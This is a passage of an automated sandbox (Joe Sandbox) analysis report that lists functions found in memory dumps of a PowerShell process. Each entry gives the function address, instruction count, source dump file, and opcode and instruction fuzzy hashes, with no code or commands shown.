                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e4b600216f9c2735a4c14f7175eb66f649b317e97a1b8aeede7d1fa546cae1bc
                                                • Instruction ID: cb0abc9004a13cc60baba953bef57dfb3c5247eadd3a43576dde6c863486f2e5
                                                • Opcode Fuzzy Hash: e4b600216f9c2735a4c14f7175eb66f649b317e97a1b8aeede7d1fa546cae1bc
                                                • Instruction Fuzzy Hash: DC91AE342006558FC714EB68C891AAE73A3EFC5208B468D68D546CF765DF78ED0ACBE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087F8288 Relevance: .2, Instructions: 235COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fb0dc2f9548d1296ed8af0433527fd53df84da920fff6fa889af1ddb393080fa
                                                • Instruction ID: 74eef7b10c3bf96390bcbee2ad6aad15ccbf4d007c1e32d02bd9f266ed9ba5dd
                                                • Opcode Fuzzy Hash: fb0dc2f9548d1296ed8af0433527fd53df84da920fff6fa889af1ddb393080fa
                                                • Instruction Fuzzy Hash: 2E915D34B002059FCB04DF65D494AAEB7E6EF88315B148439E90A9B3A5DB38DD41CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087FB6DA Relevance: .2, Instructions: 232COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7217752324f06604d11ba33ad610361206e7d1cdd04987dd2df5927155b67f1e
                                                • Instruction ID: 8f34d25f82937a4bf046ea9e3559d31fcbc8a7aace5aeedffe832562f79b3320
                                                • Opcode Fuzzy Hash: 7217752324f06604d11ba33ad610361206e7d1cdd04987dd2df5927155b67f1e
                                                • Instruction Fuzzy Hash: AEA17934A00208DFDB14DFA5C494BAEBBB2FF84315F558069D545AB39ACB34E881CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087F9F50 Relevance: .2, Instructions: 225COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aab10b36daecb671ce2d49019c86c5677202fce943153c5cacf5d2845b7c51c9
                                                • Instruction ID: 8f9b798ef565ebe43af26938aaf0cb329b01f037647a93b04fd08666c772c970
                                                • Opcode Fuzzy Hash: aab10b36daecb671ce2d49019c86c5677202fce943153c5cacf5d2845b7c51c9
                                                • Instruction Fuzzy Hash: 0081F1306043498FCB10EB78D08199EBBB3EF85218B028D6CE5469B765DB38ED07CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087FA860 Relevance: .2, Instructions: 211COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 24c188de60b2566273d71c4da7953c141dea69c0d911d3ae06d45bbbc14b8342
                                                • Instruction ID: b61787662fe63580caab6f32d9e9049e8ecd1750888bab88b22e7de9a9150f29
                                                • Opcode Fuzzy Hash: 24c188de60b2566273d71c4da7953c141dea69c0d911d3ae06d45bbbc14b8342
                                                • Instruction Fuzzy Hash: D581E332E002589FCB15CFA5C8006DDFBB2EF89319F158569D905BB391EB35AD46CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863C440 Relevance: .2, Instructions: 209COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b6c5e9df237a28e72f4508448a47f19c897e7fe9e9bb8a650d80d94dc52f9448
                                                • Instruction ID: 7286a9e3881895b95a6e7ee583e2547870132dacf5a8efb825a9e35e3963a864
                                                • Opcode Fuzzy Hash: b6c5e9df237a28e72f4508448a47f19c897e7fe9e9bb8a650d80d94dc52f9448
                                                • Instruction Fuzzy Hash: 7F919C74A002199FCB04DFA8C454A9EBBF2FF89301F118468E906AF365DB75AD45CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08638E92 Relevance: .2, Instructions: 191COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c49688f313844b48da941829656b88644679b378ce65aaa336efe96b780bc384
                                                • Instruction ID: 28a91caf8c9437bbc55fdcc8dec9ed961314afc0354e1cc7f14c008359b1605e
                                                • Opcode Fuzzy Hash: c49688f313844b48da941829656b88644679b378ce65aaa336efe96b780bc384
                                                • Instruction Fuzzy Hash: A5615839B002148FCB14DBB8D4596AEBBB2EF89311F158069D816E7391DB399C46CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08673668 Relevance: .2, Instructions: 188COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984817224.0000000008670000.00000040.00000800.00020000.00000000.sdmp, Offset: 08670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8670000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b085d401c71ad52349a301faf02c05326abeab7b629355fef95eb84f43a86b7b
                                                • Instruction ID: bbece97a76b22aa319d0e0f5d22c048d94c0984336cea0eb33b4ce6b031e4c3b
                                                • Opcode Fuzzy Hash: b085d401c71ad52349a301faf02c05326abeab7b629355fef95eb84f43a86b7b
                                                • Instruction Fuzzy Hash: 3C714D74A00209CFCB14DF99C584AAEBBF2EF88324F568569D505AB361D770EC46CBD0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08670C60 Relevance: .2, Instructions: 187COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984817224.0000000008670000.00000040.00000800.00020000.00000000.sdmp, Offset: 08670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8670000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1cc3d1ae035a6fd7e5ca25cb86365067e3a5548353ccb5286c6a60761750508f
                                                • Instruction ID: fa97af0dd2c32511945a82ab368ce546bf8def133cc1c173081df710f594c3f9
                                                • Opcode Fuzzy Hash: 1cc3d1ae035a6fd7e5ca25cb86365067e3a5548353ccb5286c6a60761750508f
                                                • Instruction Fuzzy Hash: 6C616D34A007048FCB14DBB8D4546EDBBF2EF89315F158569D816AB390DB39AC46CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 086709E0 Relevance: .2, Instructions: 184COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984817224.0000000008670000.00000040.00000800.00020000.00000000.sdmp, Offset: 08670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8670000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dd3e87ca60dec9f2812dba1cef2897fe2d9e59fd0c6c0ca25cc11eab6e0cb0bc
                                                • Instruction ID: 35327a4a3e5c783207485a6294f1b1b1771ec169bf5ecfb86fe82a5e4ab7beaf
                                                • Opcode Fuzzy Hash: dd3e87ca60dec9f2812dba1cef2897fe2d9e59fd0c6c0ca25cc11eab6e0cb0bc
                                                • Instruction Fuzzy Hash: 8D719134A04758DFCB05DB64D88099DBBF2FF89315F1685A9E545EB361CB30AC06CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087FA3AE Relevance: .2, Instructions: 183COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0773191a6731013a9d602b262050f767fdbab9ae63b9e274ba2ad8c177010f32
                                                • Instruction ID: 71536ba20eaa413d32e0e10da06d8ebf9974a4f214c2b0b8c0398af6ace81362
                                                • Opcode Fuzzy Hash: 0773191a6731013a9d602b262050f767fdbab9ae63b9e274ba2ad8c177010f32
                                                • Instruction Fuzzy Hash: 02615E34A00215CFDB24DFA5C498AAEBBB2FF84319F15842CD50AAB799DB74DC46CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863C780 Relevance: .2, Instructions: 175COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f4c93e0ef2e1ab494569eb7cdfabfc07579b3ae1fe894f030b6748e302dcc2af
                                                • Instruction ID: cfef956ba39036fda98f59d8baf10fbb0e02e50db69f7f81e48a05040afe655d
                                                • Opcode Fuzzy Hash: f4c93e0ef2e1ab494569eb7cdfabfc07579b3ae1fe894f030b6748e302dcc2af
                                                • Instruction Fuzzy Hash: 0C712F78E40248AFD714DFA0D8A1BEE7BB2FF85301F114429E5057B790DB7A6845DB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863DF08 Relevance: .2, Instructions: 174COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a5ae5d90c60974ffefb11a52f708e045aaf54e5286103e4f8717f5df1c975314
                                                • Instruction ID: 3b61f6f77a5d850d2c229248a7588dbd79ffc5d9e92494436aad4911ef5a030e
                                                • Opcode Fuzzy Hash: a5ae5d90c60974ffefb11a52f708e045aaf54e5286103e4f8717f5df1c975314
                                                • Instruction Fuzzy Hash: D751D4313043449FC324DB68D891B9E73E7FFC5614F118A2DE24ADB6A1DB74AC0A87A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863C790 Relevance: .2, Instructions: 168COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9d7049e03438929a7d264e32c63e3ce59bcfb7f7c3821f131a898a92e59fadc9
                                                • Instruction ID: d50b6f19e23d43d79c9bcdacdf0f473cee6339f53291580c700404de82943486
                                                • Opcode Fuzzy Hash: 9d7049e03438929a7d264e32c63e3ce59bcfb7f7c3821f131a898a92e59fadc9
                                                • Instruction Fuzzy Hash: 12711E78E40248AFDB14DFA0D8A1BED77B2FF88301F514429E5057B790DB7A6845DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08631ED0 Relevance: .2, Instructions: 165COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3ffe8d23626842a1fca747077809bcd6900190a32699df813de00ddf903226a9
                                                • Instruction ID: d5e065f944645c1ef7f49c03c9a47b4abe004847691db23ea17768d87ea17a48
                                                • Opcode Fuzzy Hash: 3ffe8d23626842a1fca747077809bcd6900190a32699df813de00ddf903226a9
                                                • Instruction Fuzzy Hash: 1B51E234604219CFCB04DF64D494ADEBBB2FF89305F1685A9D505EB3A1DB389C46CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863F24D Relevance: .2, Instructions: 157COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 445129e132775ec1223171b8102127616e19182215d64436a1b996a2087e0659
                                                • Instruction ID: 8336990a548a34a3ad2b54f445059bcb499c601f7c1615fd0d275707eda61979
                                                • Opcode Fuzzy Hash: 445129e132775ec1223171b8102127616e19182215d64436a1b996a2087e0659
                                                • Instruction Fuzzy Hash: DB518F742007019FC3249F74D884B6AB7E3EF85325F108A2DE5668B7D1DF79E8468B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863F250 Relevance: .2, Instructions: 157COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 27e5c4cc06a094105448932fc57ae9bf077a66c61639f5728aca2e1ecd407aaa
                                                • Instruction ID: e4cc82b968eaab227973b38573af1f8713e19775e09996fd38e8f0aa25e598fa
                                                • Opcode Fuzzy Hash: 27e5c4cc06a094105448932fc57ae9bf077a66c61639f5728aca2e1ecd407aaa
                                                • Instruction Fuzzy Hash: EE518D742007019FC3249F78D884B6AB7E3EB85325F118A2DE5668B7D1DF79E8468B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087FA850 Relevance: .2, Instructions: 152COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fb5259eccdacd4cc28e6dd8d52d0dfc1fcbb5b256302704b746a1f7072d6a563
                                                • Instruction ID: db98feab857fdf51126addd546ffb5265b22c01b54c62f967b96eacb86243cf0
                                                • Opcode Fuzzy Hash: fb5259eccdacd4cc28e6dd8d52d0dfc1fcbb5b256302704b746a1f7072d6a563
                                                • Instruction Fuzzy Hash: 7051E532E006588FCF11CF65C8406DDFBB1EF85319F258569C6097B385E731A946CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087F9130 Relevance: .2, Instructions: 152COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3140f668947f6b2f8629df5dcdd98c2f13229222eb83ece1fa83dd33caf2ad83
                                                • Instruction ID: 0a5ce79b819016d12b147c3fcb715c86df5ec87e3c24b2b956aab97a8d0021cc
                                                • Opcode Fuzzy Hash: 3140f668947f6b2f8629df5dcdd98c2f13229222eb83ece1fa83dd33caf2ad83
                                                • Instruction Fuzzy Hash: B0511734A00208CFDB14CFA9C494BEEBBF6AB88355F148069DA05AB395DB35D846CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08632E70 Relevance: .1, Instructions: 148COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 10c536f511658de7818f5418443b47ce114d757521878a146f643e1efcbff8e1
                                                • Instruction ID: 549fedcb80221d326cab573a38fdb0c4cf5f75bd126429312b6c57ee518da872
                                                • Opcode Fuzzy Hash: 10c536f511658de7818f5418443b47ce114d757521878a146f643e1efcbff8e1
                                                • Instruction Fuzzy Hash: 93514A70A002159FDB18DFA4D594BAEBBF6AF88305F15816DE806AB3A0DB35EC45CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08632E5F Relevance: .1, Instructions: 146COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 893934a43a2068a646684581cca7be8960635e86da4cbcca118c66ccaf8a5f11
                                                • Instruction ID: 2f159e3147e11540bc63589cbb58397030804911c2c97fb23ea8286f773608b9
                                                • Opcode Fuzzy Hash: 893934a43a2068a646684581cca7be8960635e86da4cbcca118c66ccaf8a5f11
                                                • Instruction Fuzzy Hash: 5B516970A002159FDB18DFA4D594BAEBBF2AF48306F15806DE806AB3A1DB34EC45CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08631140 Relevance: .1, Instructions: 144COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5639d0c084f0b24b17db92a9182f911bb4f160a0fa9ad8e87211dbc7f98e164a
                                                • Instruction ID: 38bed587f60c444460e0333aff6b8a9add1c852233bda34efb8919422d1a2f7a
                                                • Opcode Fuzzy Hash: 5639d0c084f0b24b17db92a9182f911bb4f160a0fa9ad8e87211dbc7f98e164a
                                                • Instruction Fuzzy Hash: A751D434700201AFDB24EB74D885BAE77A3EF81315F054968E506AF795CB75AC06CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087FFD6C Relevance: .1, Instructions: 140COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 44caffd1f4cb29fdd2eb08fbe56e5816e86c3c62d04a09f3f237d0aaa461f321
                                                • Instruction ID: 814bbbb3a6a7a91993f00abde4ea1936c4e643885c9295f3be1e1ecb9fb6250b
                                                • Opcode Fuzzy Hash: 44caffd1f4cb29fdd2eb08fbe56e5816e86c3c62d04a09f3f237d0aaa461f321
                                                • Instruction Fuzzy Hash: EF516C35A007058FC714DF69C4849AEBBF2EFC9314B258A6DE146AB361DF34AC46CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087F7998 Relevance: .1, Instructions: 139COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d74e64c19643488db5697fb95471319346523015f00d95bc8f4a3b7a78584fe8
                                                • Instruction ID: f7ad7d13dba06ac44a3e2ca0236ba3e9d8242bc141a720786b895076d4e2b2fa
                                                • Opcode Fuzzy Hash: d74e64c19643488db5697fb95471319346523015f00d95bc8f4a3b7a78584fe8
                                                • Instruction Fuzzy Hash: EB512834A00204CFCB58DB7AD444AAEBBF2EF88356B15806DE906E7355DB35D841CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863F590 Relevance: .1, Instructions: 137COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b466fb1a723665510336f77bfc771e74c40f06fe7d4415aa04d23d1b4e1a96cb
                                                • Instruction ID: af734ddbf524ffc8f7ca1ff7a16da1d4477e37addeda34e6661edf80ccb3c9e6
                                                • Opcode Fuzzy Hash: b466fb1a723665510336f77bfc771e74c40f06fe7d4415aa04d23d1b4e1a96cb
                                                • Instruction Fuzzy Hash: B7412734A082955FCF15DF789464AAE7FF6AF89200F05406DE845D7352CF388D06D7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08670C54 Relevance: .1, Instructions: 136COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984817224.0000000008670000.00000040.00000800.00020000.00000000.sdmp, Offset: 08670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8670000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 69ad617d5a902358b15b1a7b2a8c7328603070b5491865da0e1e213aca91be34
                                                • Instruction ID: 4852fa1f4194a056f23e731d2b30d2bab26f0adeae039b1e9ffc93892219bf5b
                                                • Opcode Fuzzy Hash: 69ad617d5a902358b15b1a7b2a8c7328603070b5491865da0e1e213aca91be34
                                                • Instruction Fuzzy Hash: A3514C34A00719CFCB14DF68D444AEDB7F2EF88315F15892DD815AB350DB74A846CBA6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863D2A8 Relevance: .1, Instructions: 133COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c1244d9d3954722400eafe591e4b450b1b9b88fd2d538cacd84895693352c010
                                                • Instruction ID: 82b16262863ee495b5d6f2c0536be405d927a1430f07b120e3bae3f7dd904c79
                                                • Opcode Fuzzy Hash: c1244d9d3954722400eafe591e4b450b1b9b88fd2d538cacd84895693352c010
                                                • Instruction Fuzzy Hash: 8C41CFB8700760ABDB249F6CD8446AE7AE6FFC9212B15442CE947D7341DF78EC158B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 086311A0 Relevance: .1, Instructions: 129COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8f61996906b70e7485fbe94ea795cefea232181c312f0a1db07c1e9d0f1cd9f5
                                                • Instruction ID: 8a12b57ae01150417da12d9fb27b9dd20de5ba81bbc759e4bcb856ce339a0b2c
                                                • Opcode Fuzzy Hash: 8f61996906b70e7485fbe94ea795cefea232181c312f0a1db07c1e9d0f1cd9f5
                                                • Instruction Fuzzy Hash: 6E41B5346002016FDB24EB74C885BAE37A3EF85314F054978E502AF795DB79AC06CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087FBA1E Relevance: .1, Instructions: 127COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a97e0567e46733534bd0980782caee8133bc116da199e80a73098e37d2dec395
                                                • Instruction ID: 77e0bbd0a213f51cc3b35ae88ebc68ac52f310accb382c3817e8a0d23b048b74
                                                • Opcode Fuzzy Hash: a97e0567e46733534bd0980782caee8133bc116da199e80a73098e37d2dec395
                                                • Instruction Fuzzy Hash: 1A516A74A00209DFDB14DFA5D8947AEBBB6FB88310F108428E50AAB395CF349D85DF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08632438 Relevance: .1, Instructions: 121COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e73076d157b4c534d87894f7aae263200f30cdff664776968bdd04425f3d91a9
                                                • Instruction ID: 98a7776e978fe1e424e32a143697fd78e88f3d19254c9284fd3fc29218395a09
                                                • Opcode Fuzzy Hash: e73076d157b4c534d87894f7aae263200f30cdff664776968bdd04425f3d91a9
                                                • Instruction Fuzzy Hash: 9E416E71A00224CBDB15CF69D5607EDB7F1EF88267F068069D505E7350EB359E46CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087F7988 Relevance: .1, Instructions: 118COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bbf9b4f42bda82b51be266b5faf8919fff4b341363a1a205ccf5a95175d9e890
                                                • Instruction ID: 3aaf9aa5d7b8a2bff368744609fd34fe563687f44608ee1503e438456a0a164e
                                                • Opcode Fuzzy Hash: bbf9b4f42bda82b51be266b5faf8919fff4b341363a1a205ccf5a95175d9e890
                                                • Instruction Fuzzy Hash: 40413534A00254CFCB58DF7AC444AAABBF2EF89356B1580BDD906AB355DB35D841CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863170D Relevance: .1, Instructions: 117COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8ef8eca9e09c19943571a366c7050dec52f89e3a90f656327472c5400a79d071
                                                • Instruction ID: dabf9d17fdcb492e2a3adadd2c0967d0ccdcf93efc27200ba7defc2eb174a12d
                                                • Opcode Fuzzy Hash: 8ef8eca9e09c19943571a366c7050dec52f89e3a90f656327472c5400a79d071
